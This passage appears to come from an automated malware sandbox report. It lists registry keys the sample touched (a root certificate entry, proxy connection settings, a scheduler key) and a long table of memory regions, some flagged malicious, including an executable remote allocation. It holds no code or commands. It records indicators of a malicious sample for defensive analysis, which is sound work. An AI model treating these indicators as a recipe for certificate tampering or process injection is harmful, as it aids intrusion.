HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\377BF
377BF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Handshake\{819EB824-4817-4048-BBF5-A7A0A0C35676}
data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 67 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
874000
heap
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
25D3000
trusted library allocation
page read and write
malicious
2410000
trusted library allocation
page read and write
malicious
350F000
trusted library allocation
page read and write
malicious
3529000
trusted library allocation
page read and write
malicious
2591000
trusted library allocation
page read and write
malicious
274000
heap
page read and write
62D000
heap
page read and write
1B2BB000
stack
page read and write
866E000
stack
page read and write
439E000
heap
page read and write
274F000
trusted library allocation
page read and write
4F7000
heap
page read and write
4F24000
heap
page read and write
2C1A000
stack
page read and write
4D7C000
heap
page read and write
2699000
trusted library allocation
page read and write
2725000
trusted library allocation
page read and write
49D000
direct allocation
page read and write
48FD000
heap
page read and write
3A0000
heap
page read and write
646000
heap
page read and write
1C8A0000
heap
page read and write
271B000
trusted library allocation
page read and write
2C45000
trusted library allocation
page read and write
26BD000
trusted library allocation
page read and write
2C2D000
trusted library allocation
page read and write
564000
heap
page read and write
269F000
trusted library allocation
page read and write
52AD000
heap
page read and write
539E000
heap
page read and write
48FD000
heap
page read and write
375D000
trusted library allocation
page read and write
1B400000
heap
page read and write
110000
trusted library allocation
page read and write
22F4000
heap
page read and write
26B3000
trusted library allocation
page read and write
27B000
stack
page read and write
20F000
heap
page read and write
48C2000
heap
page read and write
4ED7000
heap
page read and write
375D000
trusted library allocation
page read and write
4E63000
heap
page read and write
7FE89264000
trusted library allocation
page read and write
2B10000
remote allocation
page read and write
197000
trusted library allocation
page execute and read and write
3D5C000
heap
page read and write
25A9000
trusted library allocation
page read and write
38D000
heap
page read and write
26D1000
trusted library allocation
page read and write
808E000
stack
page read and write
4AF1000
heap
page read and write
192000
heap
page read and write
62A000
heap
page read and write
4F43000
heap
page read and write
48F7000
heap
page read and write
4E61000
heap
page read and write
437E000
heap
page read and write
52AA000
heap
page read and write
2763000
trusted library allocation
page read and write
103C000
stack
page read and write
26DD000
trusted library allocation
page read and write
4F05000
heap
page read and write
820D000
stack
page read and write
D2C000
stack
page read and write
377000
heap
page read and write
363000
heap
page read and write
7FE89280000
trusted library allocation
page read and write
A40000
trusted library allocation
page read and write
4F0E000
heap
page read and write
4F54000
heap
page read and write
273000
heap
page read and write
1AFF7000
heap
page read and write
4C2000
heap
page read and write
4F10000
heap
page read and write
410F000
stack
page read and write
26C5000
trusted library allocation
page read and write
2C32000
trusted library allocation
page read and write
279D000
trusted library allocation
page read and write
3DAA000
heap
page read and write
42A0000
heap
page read and write
5E0000
heap
page read and write
1AF60000
heap
page read and write
512000
heap
page read and write
5BC000
heap
page read and write
3361000
trusted library allocation
page read and write
2685000
trusted library allocation
page read and write
2C29000
trusted library allocation
page read and write
2E6000
heap
page read and write
170000
heap
page read and write
4F47000
heap
page read and write
7FE89288000
trusted library allocation
page read and write
2C48000
trusted library allocation
page read and write
1B50B000
stack
page read and write
21A2000
heap
page read and write
4F2A000
heap
page read and write
5C2000
heap
page read and write
5538000
heap
page read and write
3DF0000
trusted library allocation
page read and write
2F10000
trusted library allocation
page read and write
4C0000
direct allocation
page read and write
2789000
trusted library allocation
page read and write
26F7000
trusted library allocation
page read and write
4A0000
direct allocation
page read and write
3EE000
heap
page read and write
690000
heap
page read and write
87EE000
stack
page read and write | page guard
4F47000
heap
page read and write
375D000
trusted library allocation
page read and write
4D96000
heap
page read and write
469000
heap
page read and write
3A0000
trusted library allocation
page execute and read and write
3751000
trusted library allocation
page read and write
35D000
heap
page read and write
1A8DF000
stack
page read and write
296000
heap
page read and write
3EE000
heap
page read and write
55B0000
heap
page read and write
10F0000
unkown
page readonly
3D89000
heap
page read and write
3D5C000
heap
page read and write
53CD000
heap
page read and write
910000
heap
page read and write
572B000
heap
page read and write
917000
heap
page read and write
26A3000
trusted library allocation
page read and write
3DAF000
heap
page read and write
847000
heap
page read and write
52A6000
heap
page read and write
277B000
trusted library allocation
page read and write
4AF0000
heap
page read and write
3758000
trusted library allocation
page read and write
3DA0000
trusted library allocation
page read and write
2C56000
trusted library allocation
page read and write
5772000
heap
page read and write
3DB000
heap
page read and write
26E7000
trusted library allocation
page read and write
334000
heap
page read and write
31D000
heap
page read and write
1B5BE000
stack
page read and write
1C6F0000
heap
page read and write
1F30000
heap
page read and write
4F2A000
heap
page read and write
3CF0000
heap
page read and write
469000
heap
page read and write
36E000
heap
page read and write
4F45000
heap
page read and write
371F000
trusted library allocation
page read and write
3CF0000
heap
page read and write
5738000
heap
page read and write
44F000
unkown
page read and write
1B4AE000
stack
page read and write
277F000
stack
page read and write
4F10000
heap
page read and write
4A54000
heap
page read and write
4F03000
heap
page read and write
34D1000
trusted library allocation
page read and write
7FE8A934000
trusted library allocation
page read and write
5230000
trusted library allocation
page read and write
1CB0000
direct allocation
page read and write
3758000
trusted library allocation
page read and write
33C0000
direct allocation
page read and write
48FD000
heap
page read and write
4367000
heap
page read and write
2D83000
trusted library allocation
page read and write
3610000
heap
page read and write
1AA29000
stack
page read and write
4BDE000
heap
page read and write
5780000
heap
page read and write
3CF0000
heap
page read and write
5236000
heap
page read and write
4321000
heap
page read and write
4301000
heap
page read and write
27A1000
trusted library allocation
page read and write
27A5000
trusted library allocation
page read and write
52AA000
heap
page read and write
48F7000
heap
page read and write
4D00000
heap
page read and write
60000
heap
page read and write
26A5000
trusted library allocation
page read and write
1EDF000
stack
page read and write
24BE000
stack
page read and write
3EF000
heap
page read and write
2C50000
trusted library allocation
page read and write
420000
trusted library allocation
page read and write
4F1A000
heap
page read and write
3C2000
trusted library allocation
page read and write
350F000
trusted library allocation
page read and write
4D73000
heap
page read and write
26F3000
trusted library allocation
page read and write
36E000
heap
page read and write
3D37000
heap
page read and write
4F5B000
heap
page read and write
4DD9000
heap
page read and write
3A7000
heap
page read and write
EF2000
heap
page read and write
4F3A000
heap
page read and write
4BDE000
heap
page read and write
539E000
heap
page read and write
4F0000
trusted library allocation
page read and write
2687000
trusted library allocation
page read and write
34DD000
trusted library allocation
page read and write
4E0000
trusted library allocation
page read and write
4D2000
heap
page read and write
4D6B000
heap
page read and write
3D2F000
heap
page read and write
3745000
trusted library allocation
page read and write
5130000
heap
page read and write
AA0000
trusted library allocation
page read and write
7FE8923C000
trusted library allocation
page read and write
48FD000
heap
page read and write
26DF000
trusted library allocation
page read and write
53CE000
stack
page read and write
279B000
trusted library allocation
page read and write
48FD000
heap
page read and write
578D000
heap
page read and write
7B4000
heap
page read and write
272F000
trusted library allocation
page read and write
7FE8A9E0000
trusted library allocation
page read and write
3447000
direct allocation
page read and write
1D0000
trusted library allocation
page read and write
1CF3000
direct allocation
page read and write
3E9000
heap
page read and write
3581000
trusted library allocation
page read and write
26FB000
trusted library allocation
page read and write
4DB9000
heap
page read and write
390000
trusted library allocation
page read and write
4DC7000
heap
page read and write
4ECF000
heap
page read and write
572B000
heap
page read and write
1C4C5000
heap
page read and write
4D66000
heap
page read and write
10000
heap
page read and write
4C0000
trusted library allocation
page read and write
7F4F000
stack
page read and write
1CA2F000
stack
page read and write
39F000
heap
page read and write
1A0000
heap
page read and write
38D000
heap
page read and write
38E000
heap
page read and write
2D80000
trusted library allocation
page read and write
52C9000
heap
page read and write
899F000
stack
page read and write
5533000
heap
page read and write
7FE8AC60000
trusted library allocation
page read and write
48F9000
heap
page read and write
38A000
heap
page read and write
4D86000
heap
page read and write
379E000
stack
page read and write
614000
heap
page read and write
34C000
heap
page read and write
43BB000
trusted library section
page read and write
1C80F000
stack
page read and write
647000
heap
page read and write
646000
heap
page read and write
4D69000
heap
page read and write
630000
heap
page read and write
10000
heap
page read and write
5D9000
heap
page read and write
7FE891A0000
trusted library allocation
page execute and read and write
48F7000
heap
page read and write
130000
trusted library allocation
page read and write
58E000
heap
page read and write
520000
trusted library allocation
page read and write
4912000
heap
page read and write
388000
heap
page read and write
39C000
heap
page read and write
2769000
trusted library allocation
page read and write
26E9000
trusted library allocation
page read and write
4885000
heap
page read and write
490000
heap
page read and write
3749000
trusted library allocation
page read and write
558000
heap
page read and write
4F10000
heap
page read and write
27A1000
trusted library allocation
page read and write
23A5000
heap
page read and write
26F1000
trusted library allocation
page read and write
336000
heap
page read and write
4D1A000
heap
page read and write
43E0000
trusted library allocation
page read and write
3D8C000
heap
page read and write
20000
heap
page read and write
52AA000
heap
page read and write
3AC0000
trusted library allocation
page read and write
49AF000
stack
page read and write
10CC000
stack
page read and write
3EE000
heap
page read and write
2C27000
trusted library allocation
page read and write
295E000
trusted library allocation
page read and write
529A000
heap
page read and write
540000
heap
page read and write
71D000
heap
page read and write
2455000
heap
page read and write
2050000
heap
page read and write
7FE8A9EC000
trusted library allocation
page execute and read and write
360000
heap
page read and write
516F000
stack
page read and write
E0000
heap
page read and write
2701000
trusted library allocation
page read and write
30D0000
trusted library allocation
page read and write
375D000
trusted library allocation
page read and write
30A000
heap
page read and write
275F000
trusted library allocation
page read and write
491D000
stack
page read and write
46E000
heap
page read and write
3720000
trusted library allocation
page read and write
7FE8AB38000
trusted library allocation
page read and write
7CCD000
stack
page read and write
5780000
heap
page read and write
4F1E000
stack
page read and write
200000
heap
page read and write
34F8000
trusted library allocation
page read and write
2C5E000
trusted library allocation
page read and write
5376000
heap
page read and write
48F3000
heap
page read and write
3751000
trusted library allocation
page read and write
5780000
heap
page read and write
512000
heap
page read and write
4F24000
heap
page read and write
C60000
heap
page execute and read and write
7FE892D0000
trusted library allocation
page read and write
370000
trusted library allocation
page execute and read and write
2B0000
heap
page read and write
323000
heap
page read and write
5335000
heap
page read and write
2695000
trusted library allocation
page read and write
C1F000
stack
page read and write
49D000
heap
page read and write
10E0000
unkown
page readonly
39D000
heap
page read and write
37B000
heap
page read and write
366000
heap
page read and write
4F54000
heap
page read and write
3CF0000
heap
page read and write
4D2000
heap
page read and write
4F08000
heap
page read and write
4F39000
heap
page read and write
375D000
trusted library allocation
page read and write
26F5000
trusted library allocation
page read and write
527D000
heap
page read and write
2C4E000
trusted library allocation
page read and write
23DB000
heap
page read and write
56C3000
heap
page read and write
4F2A000
heap
page read and write
52B0000
heap
page read and write
3F7E000
stack
page read and write
123000
trusted library allocation
page execute and read and write
147000
trusted library allocation
page execute and read and write
4F43000
heap
page read and write
1B6D0000
heap
page read and write
4FF000
heap
page read and write
1C20000
heap
page read and write
7FE8A933000
trusted library allocation
page execute and read and write
7FE8AAEC000
trusted library allocation
page read and write
2C32000
trusted library allocation
page read and write
1B2E9000
heap
page read and write
120000
heap
page read and write
2721000
trusted library allocation
page read and write
3CBD000
heap
page read and write
34DB000
trusted library allocation
page read and write
4E80000
heap
page read and write
1D0D000
direct allocation
page read and write
4778000
heap
page read and write
31D0000
trusted library allocation
page read and write
1C1DF000
stack
page read and write
3E9000
heap
page read and write
14F000
unkown
page read and write
56F0000
heap
page read and write
1A75E000
heap
page execute and read and write
3B3E000
stack
page read and write
271000
heap
page read and write
4F43000
heap
page read and write
2C5B000
trusted library allocation
page read and write
2707000
trusted library allocation
page read and write
1BCF000
stack
page read and write
5736000
heap
page read and write
3220000
trusted library allocation
page read and write
52AF000
heap
page read and write
4F40000
heap
page read and write
4700000
heap
page read and write
1A6AF000
stack
page read and write
4F1A000
heap
page read and write
3D94000
heap
page read and write
5230000
trusted library allocation
page read and write
26FF000
trusted library allocation
page read and write
5768000
heap
page read and write
616000
heap
page read and write
864E000
stack
page read and write | page guard
290000
heap
page read and write
522000
heap
page read and write
4F2A000
heap
page read and write
389000
heap
page read and write
269C000
trusted library allocation
page read and write
4E07000
heap
page read and write
4F40000
heap
page read and write
2767000
trusted library allocation
page read and write
5E2000
heap
page read and write
276D000
trusted library allocation
page read and write
573A000
heap
page read and write
4F3A000
heap
page read and write
54B0000
heap
page read and write
1A84F000
stack
page read and write
1E40000
heap
page execute and read and write
52AF000
heap
page read and write
7FE89220000
trusted library allocation
page read and write
385000
heap
page read and write
8A1000
heap
page read and write
48F7000
heap
page read and write
137000
trusted library allocation
page read and write
7EBE000
unkown
page read and write
3A6000
heap
page read and write
20000
heap
page read and write
4F03000
heap
page read and write
3A7000
heap
page read and write
2D0000
heap
page read and write
4F54000
heap
page read and write
1C5CA000
stack
page read and write
1DC0000
heap
page read and write
1D0B000
direct allocation
page read and write
10000
heap
page read and write
4F08000
heap
page read and write
2743000
trusted library allocation
page read and write
7FE8AB12000
trusted library allocation
page read and write
1B4000
heap
page read and write
D6E000
stack
page read and write
68000
heap
page read and write
1AF69000
heap
page read and write
2C48000
trusted library allocation
page read and write
27A7000
trusted library allocation
page read and write
3CE0000
trusted library allocation
page read and write
10000
heap
page read and write
4B77000
heap
page read and write
3D37000
heap
page read and write
4ECF000
heap
page read and write
5205000
heap
page read and write
274D000
trusted library allocation
page read and write
4E5B000
heap
page read and write
3D9E000
heap
page read and write
4F5B000
heap
page read and write
67F000
unkown
page read and write
3DAA000
heap
page read and write
5337000
heap
page read and write
4F54000
heap
page read and write
5686000
heap
page read and write
4E37000
heap
page read and write
1BC6000
heap
page read and write
562E000
stack
page read and write
3D42000
heap
page read and write
851E000
stack
page read and write
643000
heap
page read and write
307A000
stack
page read and write
267F000
trusted library allocation
page read and write
54B1000
heap
page read and write
3CDF000
heap
page read and write
4EBC000
heap
page read and write
4B1000
heap
page read and write
4CD000
heap
page read and write
7FE8913C000
trusted library allocation
page execute and read and write
4040000
trusted library allocation
page read and write
12C000
stack
page read and write
2711000
trusted library allocation
page read and write
376E000
trusted library allocation
page read and write
38C000
heap
page read and write
5356000
heap
page read and write
382000
heap
page read and write
572E000
heap
page read and write
187000
trusted library allocation
page execute and read and write
3DE000
heap
page read and write
2C57000
trusted library allocation
page read and write
7FE8ABC0000
trusted library allocation
page read and write
10000
heap
page read and write
4834000
heap
page read and write
573C000
heap
page read and write
1C2A3000
heap
page read and write
3D5A000
heap
page read and write
5736000
heap
page read and write
BE0000
heap
page read and write
3EE000
heap
page read and write
2C54000
trusted library allocation
page read and write
1F20000
heap
page read and write
14D000
heap
page read and write
2C23000
trusted library allocation
page read and write
5736000
heap
page read and write
43D8000
trusted library allocation
page read and write
210000
heap
page read and write
4FD000
heap
page read and write
3A9000
heap
page read and write
2709000
trusted library allocation
page read and write
1C53D000
stack
page read and write
14D000
stack
page read and write
3DB000
heap
page read and write
1EE0000
direct allocation
page read and write
350000
heap
page read and write
3758000
trusted library allocation
page read and write
4D3000
heap
page read and write
3745000
trusted library allocation
page read and write
1A728000
heap
page execute and read and write
4F2A000
heap
page read and write
3A3000
heap
page read and write
410000
heap
page read and write
2723000
trusted library allocation
page read and write
2471000
trusted library allocation
page read and write
4DA8000
heap
page read and write
1C9CC000
stack
page read and write
3745000
trusted library allocation
page read and write
39C000
heap
page read and write
7FE8AAE3000
trusted library allocation
page read and write
50EE000
stack
page read and write
4369000
heap
page read and write
54F6000
heap
page read and write
6C5000
heap
page read and write
2E0F000
stack
page read and write
1CF0000
direct allocation
page read and write
1B15E000
stack
page read and write
15B000
trusted library allocation
page execute and read and write
1C820000
heap
page read and write
4EF4000
heap
page read and write
3D7B000
heap
page read and write
572E000
heap
page read and write
484000
heap
page read and write
4E65000
heap
page read and write
3DB000
heap
page read and write
300000
heap
page read and write
3DA0000
heap
page read and write
347000
trusted library allocation
page execute and read and write
4F3A000
heap
page read and write
1DE000
heap
page read and write
4C6000
heap
page read and write
38E000
heap
page read and write
3F84000
heap
page read and write
3D55000
heap
page read and write
52AE000
heap
page read and write
7FE8A943000
trusted library allocation
page read and write
4F3E000
heap
page read and write
19B000
trusted library allocation
page execute and read and write
32B000
heap
page read and write
3E40000
trusted library allocation
page read and write
10E000
heap
page read and write
2500000
trusted library allocation
page read and write
4F47000
heap
page read and write
4F0000
trusted library allocation
page execute and read and write
3CDF000
heap
page read and write
4D3F000
heap
page read and write
37D0000
trusted library allocation
page read and write
578D000
heap
page read and write
26AB000
trusted library allocation
page read and write
2BC0000
heap
page read and write
5780000
heap
page read and write
2C36000
trusted library allocation
page read and write
539E000
heap
page read and write
24E000
stack
page read and write
5204000
heap
page read and write
3E7000
heap
page read and write
273000
heap
page read and write
5170000
heap
page read and write
3D42000
heap
page read and write
3D95000
heap
page read and write
7FE892F0000
trusted library allocation
page read and write
3EE000
heap
page read and write
290000
heap
page read and write
2BB000
stack
page read and write
1B0C0000
heap
page read and write
33D000
trusted library allocation
page execute and read and write
4F47000
heap
page read and write
1B9000
heap
page read and write
1A7A0000
heap
page read and write
2600000
trusted library allocation
page read and write
50BE000
stack
page read and write
1C2E1000
heap
page read and write
4F47000
heap
page read and write
4F54000
heap
page read and write
5376000
heap
page read and write
273000
heap
page read and write
4F43000
heap
page read and write
43DD000
trusted library allocation
page read and write
142000
trusted library allocation
page read and write
865000
heap
page read and write
3758000
trusted library allocation
page read and write
4E65000
heap
page read and write
4C3000
heap
page read and write
420000
heap
page read and write
3A3E000
stack
page read and write
37F000
heap
page read and write
7FE89084000
trusted library allocation
page read and write
1F20000
heap
page read and write
2B0000
heap
page read and write
1B53B000
stack
page read and write
4CF1000
heap
page read and write
26CB000
trusted library allocation
page read and write
1A830000
heap
page read and write
4B75000
heap
page read and write
885E000
stack
page read and write
4F3A000
heap
page read and write
4778000
heap
page read and write
529A000
heap
page read and write
3758000
trusted library allocation
page read and write
33B0000
remote allocation
page read and write
22C7000
trusted library allocation
page read and write
3D89000
heap
page read and write
1D0F000
direct allocation
page read and write
431F000
heap
page read and write
437000
heap
page read and write
124000
trusted library allocation
page read and write
1A249000
stack
page read and write
4F1A000
heap
page read and write
881F000
stack
page read and write
267D000
trusted library allocation
page read and write
3D2F000
heap
page read and write
506E000
stack
page read and write
7FE8ABD0000
trusted library allocation
page read and write
DAE000
stack
page read and write
4834000
heap
page read and write
4E29000
heap
page read and write
29D000
stack
page read and write
2C32000
trusted library allocation
page read and write
857000
heap
page read and write
4E4C000
heap
page read and write
5246000
heap
page read and write
3400000
direct allocation
page read and write
4320000
heap
page read and write
437D000
heap
page read and write
3447000
direct allocation
page read and write
2C2E000
trusted library allocation
page read and write
5531000
heap
page read and write
2703000
trusted library allocation
page read and write
390000
trusted library allocation
page read and write
7FE893A0000
trusted library allocation
page read and write
7FE893D0000
trusted library allocation
page read and write
578D000
heap
page read and write
4D1000
heap
page read and write
500000
direct allocation
page read and write
4F24000
heap
page read and write
10B000
stack
page read and write
2C4A000
trusted library allocation
page read and write
5686000
heap
page read and write
4F3A000
heap
page read and write
34AE000
stack
page read and write
2689000
trusted library allocation
page read and write
430000
heap
page read and write
4F5B000
heap
page read and write
1C8000
trusted library allocation
page read and write
302000
heap
page read and write
131000
heap
page read and write
360000
heap
page read and write
2C5D000
trusted library allocation
page read and write
AC0000
heap
page read and write
4C2000
heap
page read and write
53B0000
heap
page read and write
130000
trusted library allocation
page read and write
730000
trusted library allocation
page execute and read and write
3CE9000
heap
page read and write
430000
heap
page read and write
487C000
heap
page read and write
10000
heap
page read and write
20000
heap
page read and write
3DAF000
heap
page read and write
5660000
heap
page read and write
268D000
trusted library allocation
page read and write
4D0000
trusted library allocation
page execute and read and write
3EE000
heap
page read and write
4F24000
heap
page read and write
22D000
trusted library allocation
page execute and read and write
34B0000
trusted library allocation
page read and write
5690000
heap
page read and write
5C3000
heap
page read and write
174000
heap
page read and write
60D000
heap
page read and write
4D64000
heap
page read and write
3773000
trusted library allocation
page read and write
4369000
heap
page read and write
48F3000
heap
page read and write
2C5A000
trusted library allocation
page read and write
510000
trusted library allocation
page read and write
2781000
trusted library allocation
page read and write
31B000
heap
page read and write
4F45000
heap
page read and write
568C000
heap
page read and write
35C000
heap
page read and write
21DC000
stack
page read and write
4D38000
heap
page read and write
7E9E000
stack
page read and write
4F0E000
heap
page read and write
4316000
heap
page read and write
1C4D6000
heap
page read and write
3D9E000
heap
page read and write
3C0000
heap
page read and write
5688000
heap
page read and write
25AB000
trusted library allocation
page read and write
2797000
trusted library allocation
page read and write
29E000
heap
page read and write
23C000
stack
page read and write
4D70000
heap
page read and write
4F5B000
heap
page read and write
377E000
trusted library allocation
page read and write
D7000
heap
page read and write
2F8000
heap
page read and write
1C496000
heap
page read and write
2775000
trusted library allocation
page read and write
C1E000
stack
page read and write | page guard
1A7A4000
heap
page read and write
49B000
remote allocation
page execute and read and write
26C3000
trusted library allocation
page read and write
5A3F000
stack
page read and write
3EE000
heap
page read and write
3DAE000
heap
page read and write
1CC5E000
stack
page read and write
7FE89350000
trusted library allocation
page read and write
1A30C000
stack
page read and write
3D9E000
heap
page read and write
2184000
heap
page read and write
1C70E000
stack
page read and write
3420000
direct allocation
page read and write
130000
heap
page read and write
2715000
trusted library allocation
page read and write
3DF000
heap
page read and write
2EE000
heap
page read and write
1A83C000
heap
page read and write
510F000
stack
page read and write
16A000
stack
page read and write
48F9000
heap
page read and write
3D8000
stack
page read and write
7FE892A0000
trusted library allocation
page read and write
51A0000
heap
page read and write
540000
trusted library section
page read and write
33E0000
direct allocation
page read and write
7FE8AB90000
trusted library allocation
page read and write
7FE8A93D000
trusted library allocation
page execute and read and write
48F9000
heap
page read and write
439D000
heap
page read and write
10E0000
unkown
page readonly
39A000
heap
page read and write
7FE89270000
trusted library allocation
page execute and read and write
21B000
stack
page read and write
4ED7000
heap
page read and write
4B87000
heap
page read and write
2180000
heap
page read and write
25C000
stack
page read and write
224000
trusted library allocation
page read and write
A9E000
stack
page read and write
50B0000
heap
page read and write
494000
heap
page read and write
20000
heap
page read and write
437D000
heap
page read and write
3D5C000
heap
page read and write
4E5B000
heap
page read and write
47C1000
heap
page read and write
7FE8908D000
trusted library allocation
page execute and read and write
52AD000
heap
page read and write
4E6A000
heap
page read and write
1CDCF000
stack
page read and write
5688000
heap
page read and write
7CE000
stack
page read and write
DF0000
heap
page execute and read and write
437D000
heap
page read and write
380000
trusted library allocation
page execute and read and write
52AD000
heap
page read and write
385000
heap
page read and write
45A5000
heap
page read and write
48F5000
heap
page read and write
2C4E000
trusted library allocation
page read and write
1B90000
heap
page read and write
610000
heap
page read and write
3453000
direct allocation
page read and write
4F43000
heap
page read and write
3758000
trusted library allocation
page read and write
4759000
heap
page read and write
121B1000
trusted library allocation
page read and write
53ED000
heap
page read and write
2681000
trusted library allocation
page read and write
35C000
heap
page read and write
464000
heap
page read and write
38A000
heap
page read and write
470000
heap
page read and write
87EF000
stack
page read and write
4040000
trusted library allocation
page read and write
6A0000
heap
page read and write
339000
heap
page read and write
52A4000
heap
page read and write
240000
heap
page read and write
1B43B000
heap
page read and write
264A000
trusted library allocation
page read and write
3D99000
heap
page read and write
6BE000
stack
page read and write
27AB000
trusted library allocation
page read and write
36D000
heap
page read and write
7FE892C0000
trusted library allocation
page read and write
150000
trusted library allocation
page read and write
3543000
trusted library allocation
page read and write
4F03000
heap
page read and write
1C47F000
stack
page read and write
4ED5000
heap
page read and write
375D000
trusted library allocation
page read and write
3EE000
heap
page read and write
62F000
heap
page read and write
4360000
heap
page read and write
7FE89340000
trusted library allocation
page read and write
365000
heap
page read and write
1D30000
heap
page read and write
424000
heap
page read and write
39C000
heap
page read and write
52AD000
heap
page read and write
2100000
heap
page execute and read and write
1C215000
heap
page read and write
267B000
trusted library allocation
page read and write
5739000
heap
page read and write
5581000
heap
page read and write
2757000
trusted library allocation
page read and write
4F66000
heap
page read and write
D4000
heap
page read and write
279000
heap
page read and write
460000
heap
page read and write
1B394000
heap
page read and write
23A0000
heap
page read and write
7F7D000
stack
page read and write
26C2000
trusted library allocation
page read and write
5230000
trusted library allocation
page read and write
578D000
heap
page read and write
4F25000
heap
page read and write
2C25000
trusted library allocation
page read and write
2440000
heap
page read and write
2777000
trusted library allocation
page read and write
730000
trusted library allocation
page execute and read and write
35C000
heap
page read and write
4DDC000
heap
page read and write
4F03000
heap
page read and write
2683000
trusted library allocation
page read and write
2EA000
heap
page read and write
1A7B9000
stack
page read and write
874000
heap
page read and write
EC2000
unkown
page execute read
38D000
heap
page read and write
5768000
heap
page read and write
269D000
trusted library allocation
page read and write
380000
heap
page read and write
4EBC000
heap
page read and write
F54000
unkown
page readonly
10000
heap
page read and write
4F05000
heap
page read and write
803F000
stack
page read and write
34D9000
trusted library allocation
page read and write
4F43000
heap
page read and write
2697000
trusted library allocation
page read and write
5337000
heap
page read and write
357000
trusted library allocation
page execute and read and write
1C4CE000
heap
page read and write
4F5B000
heap
page read and write
4B9000
heap
page read and write
861E000
stack
page read and write
277D000
trusted library allocation
page read and write
1B0000
heap
page read and write
3758000
trusted library allocation
page read and write
34F5000
trusted library allocation
page read and write
2A0000
stack
page read and write
4E9E000
heap
page read and write
622000
heap
page read and write
483000
direct allocation
page read and write
4F45000
heap
page read and write
3C0000
trusted library allocation
page read and write
3751000
trusted library allocation
page read and write
1C210000
heap
page read and write
1D1F000
stack
page read and write
4F66000
heap
page read and write
4D73000
heap
page read and write
52A8000
heap
page read and write
3CED000
heap
page read and write
26B1000
trusted library allocation
page read and write
4BE000
heap
page read and write
371F000
stack
page read and write
2B10000
remote allocation
page read and write
4F66000
heap
page read and write
10F0000
unkown
page readonly
12D000
trusted library allocation
page execute and read and write
3D37000
heap
page read and write
271D000
trusted library allocation
page read and write
31F000
stack
page read and write
4ECD000
heap
page read and write
2C23000
trusted library allocation
page read and write
2A8000
stack
page read and write
3770000
trusted library allocation
page read and write
5764000
heap
page read and write
363000
heap
page read and write
2C4E000
trusted library allocation
page read and write
310000
heap
page read and write
2739000
trusted library allocation
page read and write
20000
heap
page read and write
223000
trusted library allocation
page execute and read and write
12271000
trusted library allocation
page read and write
55B8000
heap
page read and write
1B05C000
heap
page read and write
2677000
trusted library allocation
page read and write
1D80000
trusted library allocation
page read and write
8B0000
heap
page read and write
4E1D000
heap
page read and write
329000
heap
page read and write
20000
heap
page read and write
37A0000
trusted library allocation
page read and write
323000
heap
page read and write
26E1000
trusted library allocation
page read and write
1A7E7000
heap
page read and write
3D8A000
heap
page read and write
4A50000
heap
page read and write
39D000
heap
page read and write
399000
stack
page read and write
1E86000
heap
page read and write
543D000
stack
page read and write
5768000
heap
page read and write
282000
stack
page read and write
4BE000
heap
page read and write
2B8000
heap
page read and write
1B405000
heap
page read and write
64B000
heap
page read and write
3030000
heap
page read and write
1C4E6000
heap
page read and write
3D20000
heap
page read and write
37F000
heap
page read and write
4F5B000
heap
page read and write
594F000
stack
page read and write
2C4F000
trusted library allocation
page read and write
431E000
heap
page read and write
3D8C000
heap
page read and write
1172000
unkown
page execute read
52C0000
heap
page read and write
276B000
trusted library allocation
page read and write
2C5D000
trusted library allocation
page read and write
23F000
heap
page read and write
1A31C000
stack
page read and write
3B0000
heap
page read and write
229C000
stack
page read and write
4F1C000
heap
page read and write
2C35000
trusted library allocation
page read and write
2C4A000
trusted library allocation
page read and write
82AF000
stack
page read and write
1F04000
heap
page read and write
4D71000
heap
page read and write
480000
heap
page read and write
49A000
heap
page read and write
4F66000
heap
page read and write
372F000
trusted library allocation
page read and write
7FE89082000
trusted library allocation
page read and write
7FE8AB60000
trusted library allocation
page read and write
1B2E0000
heap
page read and write
278B000
trusted library allocation
page read and write
790000
heap
page read and write
26AD000
trusted library allocation
page read and write
3D95000
heap
page read and write
26B9000
trusted library allocation
page read and write
3EE000
heap
page read and write
4F47000
heap
page read and write
4E3D000
heap
page read and write
7FE89136000
trusted library allocation
page read and write
4834000
heap
page read and write
7FE8909B000
trusted library allocation
page read and write
5A7000
heap
page read and write
375D000
trusted library allocation
page read and write
35B000
trusted library allocation
page execute and read and write
38A000
heap
page read and write
360C000
stack
page read and write
2C2B000
trusted library allocation
page read and write
3758000
trusted library allocation
page read and write
1A8D8000
stack
page read and write
3D95000
heap
page read and write
839E000
stack
page read and write
770000
heap
page read and write
3758000
trusted library allocation
page read and write
53CE000
stack
page read and write
2A60000
heap
page read and write
2719000
trusted library allocation
page read and write
7FE89166000
trusted library allocation
page execute and read and write
1A67A000
stack
page read and write
240000
heap
page read and write
4E6A000
heap
page read and write
2731000
trusted library allocation
page read and write
47C1000
heap
page read and write
48FD000
heap
page read and write
4F45000
heap
page read and write
278F000
trusted library allocation
page read and write
5F5000
heap
page read and write
404000
heap
page read and write
568C000
heap
page read and write
3DAA000
heap
page read and write
7FE89290000
trusted library allocation
page read and write
1F50000
direct allocation
page read and write
4F08000
heap
page read and write
4F3E000
heap
page read and write
5EE000
unkown
page read and write
3751000
trusted library allocation
page read and write
2450000
heap
page read and write
4F24000
heap
page read and write
535000
heap
page read and write
69E000
heap
page read and write
4D8A000
heap
page read and write
274B000
trusted library allocation
page read and write
2773000
trusted library allocation
page read and write
4DD6000
heap
page read and write
47C1000
heap
page read and write
7FE8ABF0000
trusted library allocation
page read and write
272B000
trusted library allocation
page read and write
56E0000
heap
page read and write
375D000
trusted library allocation
page read and write
3E9000
heap
page read and write
38D000
heap
page read and write
157000
trusted library allocation
